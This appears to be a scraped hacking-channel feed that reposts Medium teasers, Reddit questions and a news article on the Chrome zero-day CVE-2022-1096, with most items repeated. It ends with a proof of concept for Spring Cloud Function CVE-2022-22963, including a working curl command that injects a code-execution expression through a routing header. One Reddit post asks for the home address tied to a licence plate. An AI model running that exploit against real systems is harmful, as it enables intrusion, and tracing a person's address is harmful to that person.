CloudSek EWYL 2022 CTF
https://infosecwriteups.com/cloudsek-ewyl-2022-ctf-eae4229b561c?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://infosecwriteups.com/cloudsek-ewyl-2022-ctf-eae4229b561c?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
CloudSek EWYL 2022 CTF
Solving a Harry Potter Themed CTF
Solving a Harry Potter Themed CTFContinue reading on InfoSec Write-ups » (https://infosecwriteups.com/cloudsek-ewyl-2022-ctf-eae4229b561c?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
CloudSek EWYL 2022 CTF
Solving a Harry Potter Themed CTF
Hacking on Medium
Ronin Exploit, Largest Crypto Hack to Date
https://cdn-images-1.medium.com/max/820/1*TYOYRdhyWJBELQwpIntpvQ.png
Losses in excess of $610 million.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Ronin Exploit, Largest Crypto Hack to Date
https://cdn-images-1.medium.com/max/820/1*TYOYRdhyWJBELQwpIntpvQ.png
Losses in excess of $610 million.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ronin Exploit, Largest Crypto Hack to Date
Losses in excess of $610 million.
Hacking on Medium
Insecure Deserialisation(JAVA)
https://cdn-images-1.medium.com/max/2600/1*d0NHhTUihbNfZ8bz6YXQTg.png
In this blog post we will learn what is Deserialisation .Why we need it .How it works and how can we abuse it.All in the context of java.
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Insecure Deserialisation(JAVA)
https://cdn-images-1.medium.com/max/2600/1*d0NHhTUihbNfZ8bz6YXQTg.png
In this blog post we will learn what is Deserialisation .Why we need it .How it works and how can we abuse it.All in the context of java.
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Insecure Deserialisation(JAVA)
In this blog post we will learn what is Deserialisation .Why we need it .How it works and how can we abuse it.All in the context of java.
Hacking on Medium
Cross-Contract Reentrancy Attack
https://cdn-images-1.medium.com/max/1200/1*vdXpQwo7YavhbQSbLoDT0w.png
Reentrancy attack is one of the most common attacks on EVM-based smart contracts. It is an attack with devastating damages, which can be…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Cross-Contract Reentrancy Attack
https://cdn-images-1.medium.com/max/1200/1*vdXpQwo7YavhbQSbLoDT0w.png
Reentrancy attack is one of the most common attacks on EVM-based smart contracts. It is an attack with devastating damages, which can be…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cross-Contract Reentrancy Attack
Reentrancy attack is one of the most common attacks on EVM-based smart contracts. It is an attack with devastating damages, which can be…
Hacking on Medium
CloudSek EWYL 2022 CTF
https://cdn-images-1.medium.com/max/2600/1*lEqj94rcqFK9llK9vY75xg.png
Solving a Harry Potter Themed CTF
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
CloudSek EWYL 2022 CTF
https://cdn-images-1.medium.com/max/2600/1*lEqj94rcqFK9llK9vY75xg.png
Solving a Harry Potter Themed CTF
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Medium
CloudSek EWYL 2022 CTF
Solving a Harry Potter Themed CTF
hacking: security in practice
is there a way to hack this?
I found a fake apple watch that acts like a fitness watch is there any way to hack it to make it work like a normal smartwatch
submitted by /u/metalhatcat
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
is there a way to hack this?
I found a fake apple watch that acts like a fitness watch is there any way to hack it to make it work like a normal smartwatch
submitted by /u/metalhatcat
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
is there a way to hack this?
I found a fake apple watch that acts like a fitness watch is there any way to hack it to make it work like a normal smartwatch
hacking: security in practice
POS System Emulating or Modding
Hello Everyone, there's these old cash registers that a restaurant I work at threw out because they were old outdated technology. These registers were the Sam4s SPS2000 touch screen register, which had a lot of cool features like customizable buttons and items. Being the IT guy of the store, I've had to take home some of these registers from time to time as sometimes the software on them would get corrupt, and I'd have to manually update it from a USB with new firmware files and such. I've even restored a bricked system via tftp with files provided by the retailer.
Now that these registers are retired, I'm looking for a way to either emulate these systems and get them on a different chip (for example, getting this on a raspberry pi would be cool) or to mod it with custom code, maybe even getting it to run doom or something funny I don't know lol.
There are multiple files I have:
zImage
xlib.yaffs
sps2000
ramdisk.gz
NANDBOOT.BIN
MICOM.BIN
BOOTROM.BIN
app.yaffs
*Note that some of these files don't have extensions for some reason.
All of these files are available for download via CCR, completely legally here
All I know is that the software on the system is an ARM Based Linux distro, made to run only the sps2000 main software (which I believe is contained in the sps2000 file because I've used that file alone to update and restore the software from time to time)
Would anyone be able to help me get this either emulated or decompiled? Or have your own fun with it lol. Thank you!
submitted by /u/maxwell321
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
POS System Emulating or Modding
Hello Everyone, there's these old cash registers that a restaurant I work at threw out because they were old outdated technology. These registers were the Sam4s SPS2000 touch screen register, which had a lot of cool features like customizable buttons and items. Being the IT guy of the store, I've had to take home some of these registers from time to time as sometimes the software on them would get corrupt, and I'd have to manually update it from a USB with new firmware files and such. I've even restored a bricked system via tftp with files provided by the retailer.
Now that these registers are retired, I'm looking for a way to either emulate these systems and get them on a different chip (for example, getting this on a raspberry pi would be cool) or to mod it with custom code, maybe even getting it to run doom or something funny I don't know lol.
There are multiple files I have:
zImage
xlib.yaffs
sps2000
ramdisk.gz
NANDBOOT.BIN
MICOM.BIN
BOOTROM.BIN
app.yaffs
*Note that some of these files don't have extensions for some reason.
All of these files are available for download via CCR, completely legally here
All I know is that the software on the system is an ARM Based Linux distro, made to run only the sps2000 main software (which I believe is contained in the sps2000 file because I've used that file alone to update and restore the software from time to time)
Would anyone be able to help me get this either emulated or decompiled? Or have your own fun with it lol. Thank you!
submitted by /u/maxwell321
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
POS System Emulating or Modding
Hello Everyone, there's these old cash registers that a restaurant I work at threw out because they were old outdated technology. These registers...
hacking: security in practice
Which do you prefer?
Feel free to explain your preference in the comments
View Poll
submitted by /u/STATERA_DIGITAL
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Which do you prefer?
Feel free to explain your preference in the comments
View Poll
submitted by /u/STATERA_DIGITAL
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Which do you prefer?
Feel free to explain your preference in the comments
hacking: security in practice
is there a software to download Dropbox or Vimeo files?
I don't want to screen record, eats up too much size and my time.
submitted by /u/SayianZ
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
is there a software to download Dropbox or Vimeo files?
I don't want to screen record, eats up too much size and my time.
submitted by /u/SayianZ
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
is there a software to download Dropbox or Vimeo files?
I don't want to screen record, eats up too much size and my time.
hacking: security in practice
Finding an address
okay who here can run a south australian number plate and find the address it’s linked to. guy stole a car and a motorcycle
submitted by /u/mattatata11223
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Finding an address
okay who here can run a south australian number plate and find the address it’s linked to. guy stole a car and a motorcycle
submitted by /u/mattatata11223
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Finding an address
okay who here can run a south australian number plate and find the address it’s linked to. guy stole a car and a motorcycle
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Google Chrome Bug Actively Exploited as Zero-Day
Google Chrome Bug Actively Exploited as Zero-DayPost Views: 32
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Patreon.png
Reading Time: 2 Minutes
Google issued an update for the bug, which is found in the open-source V8 JavaScript engine.
Google has updated its Stable channel for the desktop version of Chrome, to address a zero-day security vulnerability that’s being actively exploited in the wild.
The bug, tracked as CVE-2022-1096, is a type-confusion issue in the V8 JavaScript engine, which is an open-source engine used by Chrome and Chromium-based web browsers. Type confusion, as Microsoft has laid out in the past, occurs “when a piece of code doesn’t verify the type of object that is passed to it, and uses it blindly without type-checking, it leads to type confusion…Also with type confusion, wrong function pointers or data are fed into the wrong piece of code. In some circumstances this can lead to code execution.”
Google didn’t provide additional technical details, as is its wont, but did say that it was “aware that an exploit for CVE-2022-1096 exists in the wild.” An anonymous researcher was credited with finding the issue, which is labeled “high-severity” (no CVSS score was given).
The lack of any further information is a source of frustration to some.
“As a defender, I really wish it was more clear what this security fix is,” John Bambenek, principal threat hunter at Netenrich, said via email. “I get permission-denied errors or ‘need to authenticate,’ so I can’t make decisions or advise my clients. A little more transparency would be beneficial and appreciated.”
See Also: Complete Offensive Security and Ethical Hacking Course
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Solutions-1.png Emergency Patch; Active ExploitThe internet giant has updated the Stable channel to 99.0.4844.84 for Chrome for Windows, Mac and Linux, according to the its security advisory. Microsoft, which offers the Chromium-based Edge browser, also issued its own advisory. It’s unclear whether other offerings built in V8, such as the JavaScript runtime environment Node.js, are also affected.
The patch was issued on an emergency basis, likely due to the active exploit that’s circulating, researchers noted.
“The first thing which stood out to me about this update is that it only fixes a single issue,” Casey Ellis, founder and CTO at Bugcrowd, noted by email. “This is pretty unusual for Google. They typically fix multiple issues in these types of releases, which suggests that they are quite concerned and very motivated to see fixes against CVE-2022-1096 applied across their user-base ASAP.”
He also commented on the speed of the patch being rolled out.
“The vulnerability was only reported on the 23rd of March, and while Google’s Chrome team do tend to be fairly prompt in developing, testing and rolling patches, the idea of a patch for software deployed as widely deployed as Chrome in 48 hours is something is continue to be impressed by,” he said. “Speculatively, I’d suggest that the vulnerability has been discovered via detection of active exploitation in the wild, and the combination of impact and potentially the malicious actors currently using it contributed to the fast turnaround.”
See Also: Kali Linux 2022.1 Release with Visual Updates, New Tools, Legacy SSH V8 Engine in the CrosshairsThe V8 engine has been plagued with security bugs and targeted by cyberattackers many times in the last year:
Last year delivered a total of these 16 Chrome zero days:
* CVE-2021-21148 – Feb. 4, an unnamed type of bug in V8
* CVE-2021-21224 – April 20, an issue with type confusion in V8 that could have allowed a remote attacker t[...]
___________________________
@hacking_Attack
@Hacking_Video
Google Chrome Bug Actively Exploited as Zero-Day
Google Chrome Bug Actively Exploited as Zero-DayPost Views: 32
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Patreon.png
Reading Time: 2 Minutes
Google issued an update for the bug, which is found in the open-source V8 JavaScript engine.
Google has updated its Stable channel for the desktop version of Chrome, to address a zero-day security vulnerability that’s being actively exploited in the wild.
The bug, tracked as CVE-2022-1096, is a type-confusion issue in the V8 JavaScript engine, which is an open-source engine used by Chrome and Chromium-based web browsers. Type confusion, as Microsoft has laid out in the past, occurs “when a piece of code doesn’t verify the type of object that is passed to it, and uses it blindly without type-checking, it leads to type confusion…Also with type confusion, wrong function pointers or data are fed into the wrong piece of code. In some circumstances this can lead to code execution.”
Google didn’t provide additional technical details, as is its wont, but did say that it was “aware that an exploit for CVE-2022-1096 exists in the wild.” An anonymous researcher was credited with finding the issue, which is labeled “high-severity” (no CVSS score was given).
The lack of any further information is a source of frustration to some.
“As a defender, I really wish it was more clear what this security fix is,” John Bambenek, principal threat hunter at Netenrich, said via email. “I get permission-denied errors or ‘need to authenticate,’ so I can’t make decisions or advise my clients. A little more transparency would be beneficial and appreciated.”
See Also: Complete Offensive Security and Ethical Hacking Course
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Solutions-1.png Emergency Patch; Active ExploitThe internet giant has updated the Stable channel to 99.0.4844.84 for Chrome for Windows, Mac and Linux, according to the its security advisory. Microsoft, which offers the Chromium-based Edge browser, also issued its own advisory. It’s unclear whether other offerings built in V8, such as the JavaScript runtime environment Node.js, are also affected.
The patch was issued on an emergency basis, likely due to the active exploit that’s circulating, researchers noted.
“The first thing which stood out to me about this update is that it only fixes a single issue,” Casey Ellis, founder and CTO at Bugcrowd, noted by email. “This is pretty unusual for Google. They typically fix multiple issues in these types of releases, which suggests that they are quite concerned and very motivated to see fixes against CVE-2022-1096 applied across their user-base ASAP.”
He also commented on the speed of the patch being rolled out.
“The vulnerability was only reported on the 23rd of March, and while Google’s Chrome team do tend to be fairly prompt in developing, testing and rolling patches, the idea of a patch for software deployed as widely deployed as Chrome in 48 hours is something is continue to be impressed by,” he said. “Speculatively, I’d suggest that the vulnerability has been discovered via detection of active exploitation in the wild, and the combination of impact and potentially the malicious actors currently using it contributed to the fast turnaround.”
See Also: Kali Linux 2022.1 Release with Visual Updates, New Tools, Legacy SSH V8 Engine in the CrosshairsThe V8 engine has been plagued with security bugs and targeted by cyberattackers many times in the last year:
Last year delivered a total of these 16 Chrome zero days:
* CVE-2021-21148 – Feb. 4, an unnamed type of bug in V8
* CVE-2021-21224 – April 20, an issue with type confusion in V8 that could have allowed a remote attacker t[...]
___________________________
@hacking_Attack
@Hacking_Video
Black Hat Ethical Hacking
Google Chrome Bug Actively Exploited as Zero-Day | Black Hat Ethical Hacking
Google issued an update for the bug, which is found in the open-source V8 JavaScript engine.
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Google Chrome Bug Actively Exploited as Zero-Day Google Chrome Bug Actively Exploited as Zero-DayPost Views: 32 https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Patreon.png Reading Time: 2 Minutes Google issued…
o execute arbitrary code inside a sandbox via a crafted HTML page.
* CVE-2021-30551 –- June 9, a type-confusion bug within V8 (also under active attack as a zero-day)
* CVE-2021-30563 – July 15, another type-confusion bug in V8.
* CVE-2021-30633 – Sept. 13, an out-of-bounds write in V8
* CVE-2021-37975 – Sept. 30, a use-after-free bug in V8 (also attacked as a zero-day)
* CVE-2021-38003 – Oct. 28, an inappropriate implementation in V8
* CVE-2021-4102 – Dec. 13, a use-after-free bug in V8. See Also: Offensive Security Tool: Scapy Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?
If you want to express your idea in an article contact us here for a quote: info@blackhatethicalhacking.com
See Also: Hacking stories: MafiaBoy, the hacker who took down the Internet
Source: threatpost.com Source Linkhttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch-1024x1024.png Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/685f-article-211221-chrome-site-isolation-body-text-90x90.jpg HTML parser bug triggers Chromium XSS security flaw1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Polygon-hacker-90x90.jpg Hackers getting faster at latching onto unpatched vulnerabilities2 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/mitmproxy-90x90.png HTTP request smuggling bug patched in mitmproxy3 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/ee3dc49c79d14f20970cc8b20063f52e-90x90.jpg Flash loan attack on One Ring protocol nets crypto-thief $1.4 million6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/ezgif.com-gif-maker-3-1-90x90.jpg DeadBolt Ransomware Resurfaces to Hit QNAP Again7 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/hackers-90x90.jpg Lapsus$ Data Kidnappers Claim Snatches From Microsoft, Okta1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Invisible-man-scaled-e1647906959971-90x90.jpg Browser-in-the-Browser Attack Makes Phishing Nearly Invisible1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/pdf-export-90x90.png Workaround offered for unpatched HTML-to-PDF rendering vulnerability1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/ezgif.com-gif-maker-2-scaled-90x90.jpg Caketap, a New Unix rootkit for stealing ATM banking data2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/AdobeStock_390895150_Editorial_Use_Only-1-1-min-scaled-1-90x90.jpeg Hundreds of GoDaddy-hosted sites backdoored in a single day2 weeks ago
The post Google Chrome Bug Actively Exploited as Zero-Day first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
* CVE-2021-30551 –- June 9, a type-confusion bug within V8 (also under active attack as a zero-day)
* CVE-2021-30563 – July 15, another type-confusion bug in V8.
* CVE-2021-30633 – Sept. 13, an out-of-bounds write in V8
* CVE-2021-37975 – Sept. 30, a use-after-free bug in V8 (also attacked as a zero-day)
* CVE-2021-38003 – Oct. 28, an inappropriate implementation in V8
* CVE-2021-4102 – Dec. 13, a use-after-free bug in V8. See Also: Offensive Security Tool: Scapy Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?
If you want to express your idea in an article contact us here for a quote: info@blackhatethicalhacking.com
See Also: Hacking stories: MafiaBoy, the hacker who took down the Internet
Source: threatpost.com Source Linkhttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch-1024x1024.png Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/685f-article-211221-chrome-site-isolation-body-text-90x90.jpg HTML parser bug triggers Chromium XSS security flaw1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Polygon-hacker-90x90.jpg Hackers getting faster at latching onto unpatched vulnerabilities2 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/mitmproxy-90x90.png HTTP request smuggling bug patched in mitmproxy3 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/ee3dc49c79d14f20970cc8b20063f52e-90x90.jpg Flash loan attack on One Ring protocol nets crypto-thief $1.4 million6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/ezgif.com-gif-maker-3-1-90x90.jpg DeadBolt Ransomware Resurfaces to Hit QNAP Again7 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/hackers-90x90.jpg Lapsus$ Data Kidnappers Claim Snatches From Microsoft, Okta1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Invisible-man-scaled-e1647906959971-90x90.jpg Browser-in-the-Browser Attack Makes Phishing Nearly Invisible1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/pdf-export-90x90.png Workaround offered for unpatched HTML-to-PDF rendering vulnerability1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/ezgif.com-gif-maker-2-scaled-90x90.jpg Caketap, a New Unix rootkit for stealing ATM banking data2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/AdobeStock_390895150_Editorial_Use_Only-1-1-min-scaled-1-90x90.jpeg Hundreds of GoDaddy-hosted sites backdoored in a single day2 weeks ago
The post Google Chrome Bug Actively Exploited as Zero-Day first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
Hacking on Medium
Getting started with Manual Content Discovery
https://cdn-images-1.medium.com/max/2000/0*Zlhuku2VWMB_goQ0.jpeg
Understanding Robots.txt, Favicon, HTML Headers and the Framework stack
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Getting started with Manual Content Discovery
https://cdn-images-1.medium.com/max/2000/0*Zlhuku2VWMB_goQ0.jpeg
Understanding Robots.txt, Favicon, HTML Headers and the Framework stack
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Getting started with Manual Content Discovery
Understanding Robots.txt, Favicon, HTML Headers and the Framework stack
Hacking on Medium
What is ethical hacking? A guide for beginners
https://cdn-images-1.medium.com/max/600/0*8YYyJCpXNB6yK03E
In our introduction to ethical hacking, we look at what the practice involves, why it’s important, and how you can get started with…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What is ethical hacking? A guide for beginners
https://cdn-images-1.medium.com/max/600/0*8YYyJCpXNB6yK03E
In our introduction to ethical hacking, we look at what the practice involves, why it’s important, and how you can get started with…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is ethical hacking? A guide for beginners
In our introduction to ethical hacking, we look at what the practice involves, why it’s important, and how you can get started with…
hacking: security in practice
Someone is using my email to try to hack into several of my accounts
Starting yesterday, someone tried hacking into my Coinbase using my email and the password reset function (I tracked the IP to Netherlands) and within an hour, another hack was attempted on Crypto .com, KuCoin, and Doordash. They even filed support requests using my email to try to get the password and phone number changed. I have 2FA enabled on pretty much all accounts that I have online, but these attempts are getting quite annoying. I would hope that there’s some way to only allow password requests from authorized devices, but how can I prevent these attempted hacks? Thanks!
submitted by /u/BraxXp
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Someone is using my email to try to hack into several of my accounts
Starting yesterday, someone tried hacking into my Coinbase using my email and the password reset function (I tracked the IP to Netherlands) and within an hour, another hack was attempted on Crypto .com, KuCoin, and Doordash. They even filed support requests using my email to try to get the password and phone number changed. I have 2FA enabled on pretty much all accounts that I have online, but these attempts are getting quite annoying. I would hope that there’s some way to only allow password requests from authorized devices, but how can I prevent these attempted hacks? Thanks!
submitted by /u/BraxXp
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Someone is using my email to try to hack into several of my accounts
Starting yesterday, someone tried hacking into my Coinbase using my email and the password reset function (I tracked the IP to Netherlands) and...
hacking: security in practice
Motivation?
I know how I got hacked, what I want to know what is their motivation?
i saw a couple of logins from poland and ukraine IP's
they had access to my other accounts, such as gmail, instagram, etc but they didnt even login there.
they only used it to login to my dummy discord account to spread some obvious exe virus and used my acc for a site called moonpay
what do you think is the motive behind this?
submitted by /u/stebgay
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Motivation?
I know how I got hacked, what I want to know what is their motivation?
i saw a couple of logins from poland and ukraine IP's
they had access to my other accounts, such as gmail, instagram, etc but they didnt even login there.
they only used it to login to my dummy discord account to spread some obvious exe virus and used my acc for a site called moonpay
what do you think is the motive behind this?
submitted by /u/stebgay
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Motivation?
I know how I got hacked, what I want to know what is their motivation? i saw a couple of logins from poland and ukraine IP's they had access to...
CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter' Or using Burp suite: Credits https://github.com/hktalent/spring-spel-0day-poc Download CVE-2022-22963
Read more...
To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter' Or using Burp suite: Credits https://github.com/hktalent/spring-spel-0day-poc Download CVE-2022-22963
Read more...